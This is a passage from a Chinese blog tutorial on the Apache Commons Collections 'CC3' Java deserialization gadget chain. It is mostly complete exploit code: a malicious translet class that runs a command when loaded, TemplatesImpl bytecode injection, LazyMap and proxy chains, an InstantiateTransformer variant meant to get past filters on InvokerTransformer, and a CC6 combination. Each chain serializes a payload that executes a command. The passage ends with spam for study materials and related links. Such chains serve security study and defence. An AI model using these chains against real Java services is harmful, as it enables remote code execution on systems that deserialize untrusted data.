Java反序列化-CC3链

最新推荐文章于 2025-01-17 19:23:09 发布
最新推荐文章于 2025-01-17 19:23:09 发布
阅读量355 收藏 10
点赞数 4
分类专栏: 程序员 文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84969642/article/details/138758310
版权 
        throw new RuntimeException(e);
    }
}

}


然后编译成 .class字节码文件  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/1da0405c265b50796719055ddf5a1695.png)  
 正常来说我们运行exp代码会弹窗,但是报错提示出现了空指针错误  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/63780d966773f387fee8a1fcee7eac34.png)  
 来到393行进行断点调试  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/7c4c7174b4e4c64d8566d442aecdba86.png)  
 一直按F8断点调试来到这里,可以看见前面的类加载成功了。  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/0c2be13b80b290dda06ae20d927bb6ee.png)  
 这个代码的主要意思是:


* 获取这个加载类的类名,如果类包含 AbstractTranslet这个类,就会来到下面的else代码段,所以我们才显示空指针。


我们可以让加载的类继承AbstractTranslet这个类就好了,继承类之后还要重写方法,最后变成以下代码:

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

public class Calc extends AbstractTranslet {
static {
try {
Runtime.getRuntime().exec(“calc”);
} catch (IOException e) {
throw new RuntimeException(e);
}
}

@Override
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

}

@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    
}

}


重写编译成字节码文件,最后运行exp代码,可以看见命令执行成功  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/52cba03328dbd4ce8e2235297cafcb88.png)  
 现在已经完成了一半条链了。


### CC3链=CC1前半段链+Templateslmpl类利用链


实际上链子的完整利用前半段一样只是后半段不一样  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/0a9c46a7292303ce791f7b3aaec445ce.png)  
 CC1链唯一修改的地方是这里:

Transformer[] transformers = new Transformer[]{
new ConstantTransformer(templates),
new InvokerTransformer(“newTransformer”,null,null)
};

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;

import java.awt.event.ItemListener;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;

public class CC3 {
public static void main(String[] args) throws Exception {

    TemplatesImpl templates = new TemplatesImpl();

    Class<? extends TemplatesImpl> c = templates.getClass();
    Field name = c.getDeclaredField("\_name");
    name.setAccessible(true);
    name.set(templates,"a");

    Field bytecodes = c.getDeclaredField("\_bytecodes");
    bytecodes.setAccessible(true);
    byte[] eval = Files.readAllBytes(Paths.get("E:\\Calc.class"));
    byte[][] codes = {eval};
    bytecodes.set(templates,codes);

    Field tfactory = c.getDeclaredField("\_tfactory");
    tfactory.setAccessible(true);
    tfactory.set(templates,new TransformerFactoryImpl());

// templates.newTransformer();
org.apache.commons.collections.Transformer[] transformers = new Transformer[]{
new ConstantTransformer(templates),
new InvokerTransformer(“newTransformer”,null,null)

    };
    ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
    chainedTransformer.transform(1);

}

}


可以看见命令执行成功  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/f78b3d20cd7530f1d88e069750e47ad2.png)  
 最后直接放入剩下的CC1前半链

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.map.TransformedMap;

import java.awt.event.ItemListener;
import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;

public class CC3 {
public static void main(String[] args) throws Exception {

    TemplatesImpl templates = new TemplatesImpl();

    Class<? extends TemplatesImpl> c = templates.getClass();
    Field name = c.getDeclaredField("\_name");
    name.setAccessible(true);
    name.set(templates,"a");

    Field bytecodes = c.getDeclaredField("\_bytecodes");
    bytecodes.setAccessible(true);
    byte[] eval = Files.readAllBytes(Paths.get("E:\\Calc.class"));
    byte[][] codes = {eval};
    bytecodes.set(templates,codes);

    Field tfactory = c.getDeclaredField("\_tfactory");
    tfactory.setAccessible(true);
    tfactory.set(templates,new TransformerFactoryImpl());

// templates.newTransformer();
org.apache.commons.collections.Transformer[] transformers = new Transformer[]{
new ConstantTransformer(templates),
new InvokerTransformer(“newTransformer”,null,null)

    };
    ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

// chainedTransformer.transform(1);

    HashMap<Object, Object> hashMap = new HashMap<>();
    Map lazymap = LazyMap.decorate(hashMap, chainedTransformer);
    Class<LazyMap> lazyMapClass = LazyMap.class;

    Class<?> a = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
    Constructor<?> aihConstructor = a.getDeclaredConstructor(Class.class, Map.class);
    aihConstructor.setAccessible(true);
    //转InvocationHandler类型是为了能够调用处理程序实现的接口
    InvocationHandler aih =  (InvocationHandler) aihConstructor.newInstance(Override.class, lazymap);


    Map proxyMap  = (Map) Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), new Class[]{Map.class}, aih);
    InvocationHandler o = (InvocationHandler) aihConstructor.newInstance(Override.class, proxyMap);

    serialize(o);
    unserialize("ser.bin");

}

//序列化与反序列化
public static void serialize(Object obj) throws IOException {
    ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
    oos.writeObject(obj);
}

public static Object unserialize(String Filename) throws  IOException,ClassNotFoundException{
    ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
    Object obj = ois.readObject();
    return obj;
}

}


反序列化代码后命令执行成功  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/47fa2fab6e6b0e95ce538f6f0429ed90.png)


### 代替InvokerTransformer类链


当服务过滤了这个InvokerTransformer类的时候,我们可以选择其他类代替,作为链子的一部分。  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/df9cc74a83f06ef7f0ad862f6b9dc1ec.png)  
 我们可以寻找调用 newTransformer 方法的类的方法  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/b3e0b20de0f319c1935cb1dea83dd41d.png)  
 可以看见这里调用了newTransformer()方法  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/af15ed5e7a7d6caae3a59dc7efd879fe.png)  
 但是由于 TrAXFilter 类并没有继承 序列化接口,所以它不能够进行序列化。需要 TrAXFilter 类的class才可以。


CC3的作者找到了一个 InstantiateTransformer 类的 transform方法。  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/3618b60df06adc0297aeae232048fea5.png)


* 第一个if判断传进来的参数是否是 Class类型
* 然后获取它的指定参数类型的构造器,然后调用它的构造方法


从而构造这个exp代码:

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.functors.InstantiateTransformer;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;

public class CC3 {
public static void main(String[] args) throws Exception {

    TemplatesImpl templates = new TemplatesImpl();

    Class<? extends TemplatesImpl> c = templates.getClass();
    Field name = c.getDeclaredField("\_name");
    name.setAccessible(true);
    name.set(templates,"a");

    Field bytecodes = c.getDeclaredField("\_bytecodes");
    bytecodes.setAccessible(true);
    byte[] eval = Files.readAllBytes(Paths.get("E:\\Calc.class"));
    byte[][] codes = {eval};
    bytecodes.set(templates,codes);

    Field tfactory = c.getDeclaredField("\_tfactory");
    tfactory.setAccessible(true);
    tfactory.set(templates,new TransformerFactoryImpl());
    
    InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates});
    instantiateTransformer.transform(TrAXFilter.class);
        }

//序列化与反序列化
public static void serialize(Object obj) throws IOException {
    ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
    oos.writeObject(obj);
}

public static Object unserialize(String Filename) throws  IOException,ClassNotFoundException{
    ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
    Object obj = ois.readObject();
    return obj;
}

}


运行后可以看见成功调用了 TrAXFilter类的 TrAXFilter方法,且命令执行成功  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/133c05f3aa851c0789b52d791b9291fa.png)  
 完整版exp代码:

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.map.LazyMap;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;

public class CC3 {
public static void main(String[] args) throws Exception {

    TemplatesImpl templates = new TemplatesImpl();

    Class<? extends TemplatesImpl> c = templates.getClass();
    Field name = c.getDeclaredField("\_name");
    name.setAccessible(true);
    name.set(templates,"a");

    Field bytecodes = c.getDeclaredField("\_bytecodes");
    bytecodes.setAccessible(true);
    byte[] eval = Files.readAllBytes(Paths.get("E:\\Calc.class"));
    byte[][] codes = {eval};
    bytecodes.set(templates,codes);

// Field tfactory = c.getDeclaredField(“_tfactory”);
// tfactory.setAccessible(true);
// tfactory.set(templates,new TransformerFactoryImpl());

    Transformer[]  transformers = new Transformer[]{
            new ConstantTransformer(TrAXFilter.class),
            new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates})

    };
    ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

// instantiateTransformer.transform(TrAXFilter.class);

    HashMap<Object, Object> hashMap = new HashMap<>();
    Map lazymap = LazyMap.decorate(hashMap, chainedTransformer);
    Class<LazyMap> lazyMapClass = LazyMap.class;

    Class<?> a = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
    Constructor<?> aihConstructor = a.getDeclaredConstructor(Class.class, Map.class);
    aihConstructor.setAccessible(true);
    //转InvocationHandler类型是为了能够调用处理程序实现的接口
    InvocationHandler aih =  (InvocationHandler) aihConstructor.newInstance(Override.class, lazymap);


    Map proxyMap  = (Map) Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), new Class[]{Map.class}, aih);
    InvocationHandler o = (InvocationHandler) aihConstructor.newInstance(Override.class, proxyMap);

    serialize(o);
    unserialize("ser.bin");
}

//序列化与反序列化
public static void serialize(Object obj) throws IOException {
    ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
    oos.writeObject(obj);
}

public static Object unserialize(String Filename) throws  IOException,ClassNotFoundException{
    ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
    Object obj = ois.readObject();
    return obj;
}

}


主要是修改了这段代码:

Transformer[] transformers = new Transformer[]{
new ConstantTransformer(TrAXFilter.class),
new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates})
};


实际上可以删除这段代码也可以运行,因为反序列化的时候readObject方法会自动复制\_tfactory的变量都是一样的

Field tfactory = c.getDeclaredField(“_tfactory”);
tfactory.setAccessible(true);
tfactory.set(templates,new TransformerFactoryImpl());


最后运行代码,可以发现命令执行成功  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/7520cc54951311490af63a0c5e72bdc5.png)


### CC6配合CC3的链


原理是CC6的:CC1+URLDNS反射,这里我们加到CC3里,也可以利用

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;

public class CC3 {
public static void main(String[] args) throws Exception {

    TemplatesImpl templates = new TemplatesImpl();

    Class<? extends TemplatesImpl> c = templates.getClass();
    Field name = c.getDeclaredField("\_name");
    name.setAccessible(true);
    name.set(templates,"a");

    Field bytecodes = c.getDeclaredField("\_bytecodes");
    bytecodes.setAccessible(true);
    byte[] eval = Files.readAllBytes(Paths.get("E:\\Calc.class"));
    byte[][] codes = {eval};
    bytecodes.set(templates,codes);

    Field tfactory = c.getDeclaredField("\_tfactory");
    tfactory.setAccessible(true);
    tfactory.set(templates,new TransformerFactoryImpl());



    org.apache.commons.collections.Transformer[]  transformers = new Transformer[]{
            new ConstantTransformer(TrAXFilter.class),
            new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates})

    };
    ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

// instantiateTransformer.transform(TrAXFilter.class);

    HashMap<Object, Object> hashMap = new HashMap<>();
    Map lazymap = LazyMap.decorate(hashMap, new ConstantTransformer(1));
    TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap, null);
    hashMap.put(tiedMapEntry,null);
    hashMap.remove(null);//也可以修改为lazymap,null改为任意字符都可以

    Class<LazyMap> lazyMapClass = LazyMap.class;
    Field factory = lazyMapClass.getDeclaredField("factory");
    factory.setAccessible(true);
    factory.set(lazymap,chainedTransformer);

    serialize(hashMap);
    unserialize("ser.bin");


}

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

[外链图片转存中…(img-uA3qOIEm-1715501499627)]

[外链图片转存中…(img-F62MT8dF-1715501499628)]

[外链图片转存中…(img-kKfirGZr-1715501499628)]

[外链图片转存中…(img-B1ijJ0DV-1715501499628)]

[外链图片转存中…(img-GDfthONy-1715501499629)]

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

给力! 10万用户级别账户数据追踪 99%准确率助力- Windows 日志收集转发介绍
DynamicsAgg的博客
10-20 782
运维世界常常需要从海量数据中删选出所需的信息轨迹并进行技术分析.在企业环境,特别是用户行为相关数据追述,技术上尤其难.要做到99%以上的准确性以及平台化建设,更是难上加难.设想一下, 10万级别用户,每天的账户锁定需要在1分钟内自动通知以及给出用户准确的锁定来源提示,这个方案你会怎么做? 商业和开源方案有一些但都不完整,需要管理者做自定义开发扩展.在试用了Kafka + Logstash + ElasticSearch + Kibana的方案一段时间之后,我们发现开源平台数据丢失...
Java反序列化利用篇 | CC6分析(通用版CC
哦 卷!
09-21 1446
构造方法的第二个参数用不到,所以随意传入进行,但是重要的是它接受一个Object对象,而这个对象的类需要实现Serializable接口,如果不是,则后续的序列化不能成功。属性设置为空的map对象(除上面创建的lazyMap都行),则最终就不会触发到恶意代码 (当然其他的也行:只要保证整个子到不了恶意代码就行)。方法在反序列化的时候会被调用,因此我们只需要创建一个HashMap对象,然后序列化即可。第2步将map属性设置为一个空的map对象(除上面创建的lazyMap都行)对象中的内容不完整呢?
AAA-------网安的一种管理机制--认证授权计费
2401_84970893的博客
05-12 554
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
windows日志转发
热门推荐
leeezp的博客
06-17 41万+
配置windows日志事件转发详细教程
MySQL第05章_排序与分页
LeungKiChen
11-23 571
MySQL第05章_排序与分页 #第05章_排序与分页 #1. 排序 # 如果没有使用排序操作,默认情况下查询返回的数据是按照添加数据的顺序显示的。 SELECT * FROM employees; # 1.1 基本使用 # 使用 ORDER BY 对查询到的数据进行排序操作。 # 升序:ASC (ascend) # 降序:DESC (descend) # 练习:按照salary从高到低的顺序显示员工信息 SELECT employee_id,last_name,salary FROM emp.
MySQL order by关键字详解,order by排序
libaiup的博客
11-24 2万+
关键字一、order by 简介1)order by 的作用2)语法格式二、order by 使用1)按照字段名排序2)按照索引进行排序3)降序4)按照多列排序一、order by 简介ORDER BY 关键字用于对结果集进行「排序」。1)order by 的作用ORDER BY 关键字可以使查
Java反序列化-CC2、4分析
The_W0rld的博客
07-22 1420
CC2中,使用的将不是前面的commons-collections依赖了,而是commons-collections4这个依赖,并且也采取了一下新的利用类PriorityQueue和TransformingComparator。通过PriorityQueue做为入口点,TransformingComparator作为跳板去触发利用。...
Java代码审计&原生反序列化&CC跟踪分析
qq_46081990的博客
01-24 1800
观察到decorate方法调用过该构造方法TransformedMap,由此想到可以利用decorate方法间接控制valueTransformer,即控制decorate方法的传参valueTransformer=new InvokerTransformer(),那么执行decorate方法就会触发构造方法设置valueTransformer为InvokerTransformer类对象。总结:无非就是让前面调用方法的类发生更改,控制其等于后面的类,让其调用后面类的方法。
java安全(七) 反序列化3 CC利用 TransformedMap版
weixin_45694388的博客
04-21 3737
给个关注?宝儿! 给个关注?宝儿! 给个关注?宝儿! 关注公众号:b1gpig信息安全,文章推送不错过 众所周知,CommonCollections利⽤是作为反序列化学习不可绕i过的一关 图解 先挂一张wh1te8ea的利用图解,非常直观! 代码demo 分析: 代码使用了phith0n大佬的代码,对原本复杂的源码进行了优化,适合复现以及更加深刻理解 demo代码: package test.org.vulhub.Ser; import org.apache.commons.collecti.
java反序列化 cc1 分析_java反序列化cc1分析
最新发布
2501_90223544的博客
01-17 1050
因为一些源码是class文件,工具会帮我们自动反编译的,但是我们都知道,这个东西反编译出来的,肯定不方便阅读,所以为了方便我们后续的调试,我们这里将openjdk的源码下过来,把我们需要导入到jdk中。这里我们看到,接受构造函数中的我们给他的类,然后他的transformers方法,不管他的参数的类型,只返回我们构造的时候给他的类型,好神奇正好需要。这里我们看到,他是触发valueTransformer的transform方法的,而且这是一个受保护的方法,需要在本类触发,这里往上看看。
将Windows的系统日志自动收集并且转发到syslog服务器,百试百灵
m0_46583157的博客
02-20 5379
# 将windows的系统日志自动收集并且转发到syslog服务器,百试百灵*
nmap
weixin_33836223的博客
07-31 121
目标规范: 可以通过主机名, IP地址,网络等 例:scanme.nmap.org, dream4.org/24, 192.168.0.1; 10.0.0-255.1-254 -iL <inputfilename>: 从指定文件获取主机或网络 -iR <num hosts>: 随机选择主机,(0 不限制扫描主机数) --exclude &lt...
Windows Server2019安全基线等保参考要求
weixin_52364868的博客
04-27 1985
Windows Server的基线安全(等保要求) 检查项类别 名称 方式 检查项预期 是否达标 加固建议 文档 IP协议 防火墙TCP/IP筛选配置 手动 业务所需的TCP,UDP端口和IP协议是否开放 0 开放业务所需的TCP,UDP端口和I
Java Filter 型内存马调试系列 (三)——一种Tomcat全版本获取StandardContext的新方法(全网首次发布,精调无错版)_standardcontext获取
2401_84968582的博客
05-12 386
# 最后**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。****深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!****因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**!!!!!
Javassist进行方法插桩
weixin_30381317的博客
07-13 441
javassist官网  http://jboss-javassist.github.io/javassist/ javassist API网  http://jboss-javassist.github.io/javassist/html/index.html javassist参考博客  https://www.ibm.com/developerworks/cn/java/j-dyn091...
Mysql提权
IT技术宅-北方的刀郎
03-21 2322
Mysql提权来源:本站转载 作者:佚名 时间:2012-07-19 TAG: 我要投稿Author:小乖&Mix0xrnFrom:http://www.dis9.com & http://team.f4ck.net & http://www.h4x0er.comEmail:hx0c4k@gmail.comData:2012-06-23Weibo:http://t.qq.com/HanWellZh
MYSQL提权
weixin_46626159的博客
03-19 5298
MYSQL udf 提权 一.获取网站权限 1.本地搭建pikachu靶场测试,文件上传漏洞获取webshell (1)简单的前端检测文件类型 (2)直接审查前端源代码,给它删了 (3)上传php后门代码 (4)冰蝎连接后门获取webshell 二.UDF提权 1.UDF提权知识点: (1)读取网站数据库配置文件(了解其命名规则及查找技巧) sql data inc config conn database common include等 (2)读取数据库存储或备.
mysql提权
weixin_33949359的博客
04-08 351
Namp 扫描ip端口 Cms 探测 wpscan kali 工具 Wpscan 扫描出来用户名。用用户名登录ssh 然后利用mysql UDF提权。 1.gcc-g-craptor_udf.c 编译一下下载的c文件 2.gcc-g-shared-Wl,-soname,raptor_udf.so-oraptor_udf.soraptor_udf.o-lc 3.登录...
Java反序列化回显解决方案与安全分析
"Java反序列化回显解决方案" Java反序列化回显问题是一个重要的安全议题,尤其是在网络安全领域。反序列化是指将已序列化的对象数据恢复为原来的对象状态,而这个过程如果处理不当,可能会被恶意利用。在Java中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值